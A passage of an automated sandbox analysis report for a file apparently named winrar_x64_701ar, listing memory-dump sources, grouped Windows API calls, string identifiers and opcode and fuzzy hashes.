                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: ChangeCloseFindNotification
                                                            • String ID:
                                                            • API String ID: 2591292051-0
                                                            • Opcode ID: 3b82a6023a20df79a4367766d46024c1a82b0f45e6a7cb7470ce24be78ea5211
                                                            • Instruction ID: 480992cb9c0d7cdafb2de658491344f4943240f5cf7a889ca68564f9850ec247
                                                            • Opcode Fuzzy Hash: 3b82a6023a20df79a4367766d46024c1a82b0f45e6a7cb7470ce24be78ea5211
                                                            • Instruction Fuzzy Hash: D8F09C32A0CA4185FF248F35E046BB96660D725B79F595334D7FC451D5DF28D495C300
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: BitmapCreateFromGdipStream
                                                            • String ID:
                                                            • API String ID: 1918208029-0
                                                            • Opcode ID: 446f61bfadfe570d130a4e3bd9fb0c0ec4c3e47e31c578352c1c198b84ceca1a
                                                            • Instruction ID: c90d5c01a5d2d656780a8cffc39f32adee5c93545d360919022bcd9d8e15b8ff
                                                            • Opcode Fuzzy Hash: 446f61bfadfe570d130a4e3bd9fb0c0ec4c3e47e31c578352c1c198b84ceca1a
                                                            • Instruction Fuzzy Hash: 25E04FA5A24B4182DB04DF66E492BA96320FF6DB86F441135EECD9B349DF3CD5588700
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: Window
                                                            • String ID:
                                                            • API String ID: 2353593579-0
                                                            • Opcode ID: 2323ccc5e59be8ee0254885ef1c083fa11a3be6e46f9bc61acf87414425a04a4
                                                            • Instruction ID: 0600c2d2f21f4933872a79a66df6a064f36625cee0428d357ff16780b70292ab
                                                            • Opcode Fuzzy Hash: 2323ccc5e59be8ee0254885ef1c083fa11a3be6e46f9bc61acf87414425a04a4
                                                            • Instruction Fuzzy Hash: B7E0866270894181E7148F5AF88157923B0DB5CBD4F145030EB8DC7324DE38C8E18700
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: __vcrt_uninitialize_ptd
                                                            • String ID:
                                                            • API String ID: 1180542099-0
                                                            • Opcode ID: f1178bfb67fd1e9b74311116ca1de370e57ed1851a15a2e9a1d2a64c8fc5a076
                                                            • Instruction ID: 82cb0a5c0bf2f6df402bca81b722f25002aa341a4115bc267d8fadba362d50eb
                                                            • Opcode Fuzzy Hash: f1178bfb67fd1e9b74311116ca1de370e57ed1851a15a2e9a1d2a64c8fc5a076
                                                            • Instruction Fuzzy Hash: 96E0B660E192028DE974BF3874438B916505F77313E900975D4DEE22D29F2DA2026610
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: BitmapCreateFromGdip
                                                            • String ID:
                                                            • API String ID: 4184683939-0
                                                            • Opcode ID: 2835fb5b02d24504015d22796a8bb097095c226e53ff9630aea8b93b024342d5
                                                            • Instruction ID: b406bb21bd105c431cd9511a19158021472eb15fe0fdbcd4cdcb28df624433bc
                                                            • Opcode Fuzzy Hash: 2835fb5b02d24504015d22796a8bb097095c226e53ff9630aea8b93b024342d5
                                                            • Instruction Fuzzy Hash: 3ED0A900F1860280EA589E63A49683852919BFFFC9F184030CDCEDF304CC2CD4814B80
                                                            APIs
                                                              • Part of subcall function 00007FF6C3BA6458: GetModuleHandleW.KERNEL32(?,?,?,?,00007FF6C3BA5B30), ref: 00007FF6C3BA645E
                                                              • Part of subcall function 00007FF6C3BA6458: FindResourceW.KERNEL32(?,?,?,?,00007FF6C3BA5B30), ref: 00007FF6C3BA6474
                                                            • SetProcessDefaultLayout.USER32 ref: 00007FF6C3BA5B3E
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: DefaultFindHandleLayoutModuleProcessResource
                                                            • String ID:
                                                            • API String ID: 4238118935-0
                                                            • Opcode ID: 1194b935c239007cd5f67d2b8d9508919f7200d3e35f640b0abc351187ced2ef
                                                            • Instruction ID: 5746c124638bea300b80b6639351d54c2f00324ca3a171d3b13c911f88586b6d
                                                            • Opcode Fuzzy Hash: 1194b935c239007cd5f67d2b8d9508919f7200d3e35f640b0abc351187ced2ef
                                                            • Instruction Fuzzy Hash: 62D05E60E08D0380E914BF5998439F423206FB2707F800072D0CDA61D38D0DB659C751
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                            • API String ID: 808467561-2761157908
                                                            • Opcode ID: 2876494d900644a29afb1a5b15b67c8b1059c41ea66019e88c1bee61bd3e3767
                                                            • Instruction ID: 4bdb2723bc683731cc07c36229b73866c4f62e13309d537d349c72ceee421a04
                                                            • Opcode Fuzzy Hash: 2876494d900644a29afb1a5b15b67c8b1059c41ea66019e88c1bee61bd3e3767
                                                            • Instruction Fuzzy Hash: 87B2E776F182928BE7349F64E442BFD77A1FB6534AF405139DA8DA7A84DF38A500CB40
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: File$CloseDirectoryHandleRemove$AttributesCreateErrorLast$ControlCurrentDeleteDeviceProcess
                                                            • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                            • API String ID: 3322710514-3508440684
                                                            • Opcode ID: 99c31330118c449dc1cef39c88eddea7408420ac2ea0aa74bcb10c8a1c6d5c59
                                                            • Instruction ID: fee334c74d4fdf4237b9faaef0929e728d3b5879924eb4d237858c5df09fab90
                                                            • Opcode Fuzzy Hash: 99c31330118c449dc1cef39c88eddea7408420ac2ea0aa74bcb10c8a1c6d5c59
                                                            • Instruction Fuzzy Hash: 5702AF62A08A4255FB10EF60D456AFD6370EFB27A5F404132EADDE76DADE2CE509C700
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: ItemMessageSend
                                                            • String ID: %s %s$REPLACEFILEDLG
                                                            • API String ID: 3015471070-439456425
                                                            • Opcode ID: 865b78183c3d0e082317d143920b031cc7e35806cfd5b13474620c024b0bbc61
                                                            • Instruction ID: b425ed16b7775f72b8c65f1e1dad19ec7aae55ed6c099be393118655e33190d1
                                                            • Opcode Fuzzy Hash: 865b78183c3d0e082317d143920b031cc7e35806cfd5b13474620c024b0bbc61
                                                            • Instruction Fuzzy Hash: EDB19425A08A8655EB24EF21D896BFD2360FFA6789F400135D5CDAF69ADF3CD609C340
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                            • String ID:
                                                            • API String ID: 3140674995-0
                                                            • Opcode ID: eea4ae72b02310c68cbfcb40ebcbd3b76fa2b8c2e372b8786a5d16902a8ea07a
                                                            • Instruction ID: b224ffd95ea0d8ea2b5322c39e2b83a4129e0946172f457abf1642cf40b96ae4
                                                            • Opcode Fuzzy Hash: eea4ae72b02310c68cbfcb40ebcbd3b76fa2b8c2e372b8786a5d16902a8ea07a
                                                            • Instruction Fuzzy Hash: B9317272A09B818AEB608F64E8817ED7374FB95759F444039DACD97B88DF38C648C710
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                            • String ID:
                                                            • API String ID: 1239891234-0
                                                            • Opcode ID: 6dc7126bae958aafbb62ae645c9ce5dc0c359ef71b5fef61e852479692239a18
                                                            • Instruction ID: d3c66fead0d4b3b6e36bd0bc9da8890bf3001e54fb86130c6e4d8551de368a33
                                                            • Opcode Fuzzy Hash: 6dc7126bae958aafbb62ae645c9ce5dc0c359ef71b5fef61e852479692239a18
                                                            • Instruction Fuzzy Hash: 0A319636608F8186DB64CF29E8816AE73A4FB9A759F500135EACD97B59DF3CC245CB00
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: FileFind$ErrorFirstLast$Next
                                                            • String ID:
                                                            • API String ID: 869497890-0
                                                            • Opcode ID: be01675985a9e4af430eb1eacd21b50adc1fe5c5a8316179733ceb51338fdfde
                                                            • Instruction ID: 71959295ce1d1ac493213edc1a87c8d5b5f3b57174743f882f41da6655e085a8
                                                            • Opcode Fuzzy Hash: be01675985a9e4af430eb1eacd21b50adc1fe5c5a8316179733ceb51338fdfde
                                                            • Instruction Fuzzy Hash: 0C419222A08A4196DA60DF25E4526B97360FFA67B6F400331E7ED97AD6DF2CE518C700
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: memcpy_s
                                                            • String ID:
                                                            • API String ID: 1502251526-0
                                                            • Opcode ID: ccd011f23cb7e5654ec22ef562e2b0126fd7ca5cc9ef70175b0a1773cec1ee92
                                                            • Instruction ID: 9380c3383e88b072e2f1a4e7c374f74d2c4b812f7198ce0e185aa4067cb5e76d
                                                            • Opcode Fuzzy Hash: ccd011f23cb7e5654ec22ef562e2b0126fd7ca5cc9ef70175b0a1773cec1ee92
                                                            • Instruction Fuzzy Hash: F8C1E372A1828687DB34AF19B045A6AB791F7A5B85F448134DBCA93784DF3CF806CB40
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: ErrorFormatFreeLastLocalMessage
                                                            • String ID:
                                                            • API String ID: 1365068426-0
                                                            • Opcode ID: 0665922bf7abb45023e2b7dded8e0ad702c130e5ea755ad4085e22d7d74e611b
                                                            • Instruction ID: 3f2e61f4ccc2583f454df62fc7a48e481e1f2e7bb08bd0d7b4851bed97996236
                                                            • Opcode Fuzzy Hash: 0665922bf7abb45023e2b7dded8e0ad702c130e5ea755ad4085e22d7d74e611b
                                                            • Instruction Fuzzy Hash: A6F06262A2C74283F710DF51F455B3AA3A1FBA6B92F044034DACED6A88DF7CD0148B14
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: ExceptionRaise_clrfp
                                                            • String ID:
                                                            • API String ID: 15204871-0
                                                            • Opcode ID: 9f2f120d3ecb95be0da68e540d64d61f85f31db099565da766693d65c9a44c61
                                                            • Instruction ID: e68841212af3ecf737ed32c889cf88f27ab92b6f69f4d8d701e06d9fbca25ff7
                                                            • Opcode Fuzzy Hash: 9f2f120d3ecb95be0da68e540d64d61f85f31db099565da766693d65c9a44c61
                                                            • Instruction Fuzzy Hash: F0B15A77A04B898BEB55CF29C8467683BE0F785B89F188921DB9D837A8CF39D451C740
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $
                                                            • API String ID: 0-227171996
                                                            • Opcode ID: d9b61ac85c199ae343cad72166c8023041029ab95baf6ee6999918e89ee9266a
                                                            • Instruction ID: 87f717acd35881b8769ef489e6681d921abdea5b188498fea4a40d1177c6599a
                                                            • Opcode Fuzzy Hash: d9b61ac85c199ae343cad72166c8023041029ab95baf6ee6999918e89ee9266a
                                                            • Instruction Fuzzy Hash: 5AE10972A0864281E778AF25A04293D7360FF67B4AF944135CACEA3794DF3DE851CB40
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: e+000$gfff
                                                            • API String ID: 0-3030954782
                                                            • Opcode ID: a16caab20146e5fad907b32f0584b0b2d47f79384eaef0e96097227fb797859a
                                                            • Instruction ID: 3b3f60e5cc0c35d7aa201717b96f1d695ad4abd54ef4c9954569733ef26c1066
                                                            • Opcode Fuzzy Hash: a16caab20146e5fad907b32f0584b0b2d47f79384eaef0e96097227fb797859a
                                                            • Instruction Fuzzy Hash: 3F515A63B182C64AE7359E35A843B696B95E766B94F488231CBE89BAC1CF3DD444C700
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: __tmp_reference_source_
                                                            • API String ID: 0-685763994
                                                            • Opcode ID: 070bd5b6dae42b3918be0c4dbfb9d73da2874f0bd48589af32e490f6267ff18c
                                                            • Instruction ID: b703d050d2e4d90f0640f49ea2678f7f50957b53930e058b106303ca41d8e105
                                                            • Opcode Fuzzy Hash: 070bd5b6dae42b3918be0c4dbfb9d73da2874f0bd48589af32e490f6267ff18c
                                                            • Instruction Fuzzy Hash: 94929662A0C7C255EA64DF20A052BFE6771EF77786F450032EACDA7696CE2CE544C700
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: CMT
                                                            • API String ID: 0-2756464174
                                                            • Opcode ID: afb98630274028142abf6caa83fbeda3c92ca76f05d6b90c83e7cde3ee236113
                                                            • Instruction ID: eb90eb83aed6d722fd8679dc120b76ed98079e0043a12bb52cf6badcf1b4779c
                                                            • Opcode Fuzzy Hash: afb98630274028142abf6caa83fbeda3c92ca76f05d6b90c83e7cde3ee236113
                                                            • Instruction Fuzzy Hash: 4E62E472A0868296EB18DF21D552AFDB7B0FB72389F404036DACE97692CF6CE555C700
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
